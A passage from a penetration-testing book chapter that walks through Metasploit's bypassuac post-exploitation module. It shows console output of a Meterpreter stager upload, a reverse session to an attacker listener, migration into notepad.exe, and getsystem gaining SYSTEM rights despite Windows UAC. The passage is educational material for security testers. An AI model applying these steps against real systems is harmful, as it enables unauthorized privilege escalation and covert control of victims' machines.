250
Chapter 16
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1106) at Thu June 09
19:50:54 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1106) processing InitialAutoRunScript
'migrate -f'
[*] Current server process: tYNpQMP.exe (3716)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3812
[*] New server process: notepad.exe (3812)
msf post(bypassuac) >
sessions -i 2
[*] Starting interaction with 2...
meterpreter >
getsystem
...got system (via technique 1).
meterpreter >
We could also have executed
run
instead of
use
within the Meterpreter
console and it would have leveraged the default options and executed with-
out having to set up the various options.
Notice in the preceding example that we succeed in gaining system-level
rights on a target machine with UAC enabled. This small example demonstrates
how the post exploitation modules will ultimately be set up and converted.
This script works simply by uploading a previously compiled executable to
the target machine and then running it. Take a look at the post exploitation
module for a better idea of what’s going on behind the scenes:
root@bt:/opt/framework3/msf3# nano modules/post/windows/escalate/bypassuac.rb
Wrapping Up
We won’t cover all the details of the post exploitation module because it
is nearly identical to the attack shown in Chapter 13. Carefully walk through
each line, and then try to build and run your own module.
Walk through existing Meterpreter scripts and look at the different com-
mands, calls, and functions that can be used to create your own script. If you
come up with a great idea for a new script, submit it to the Metasploit devel-
opment team—who knows; it might be a script that others can use!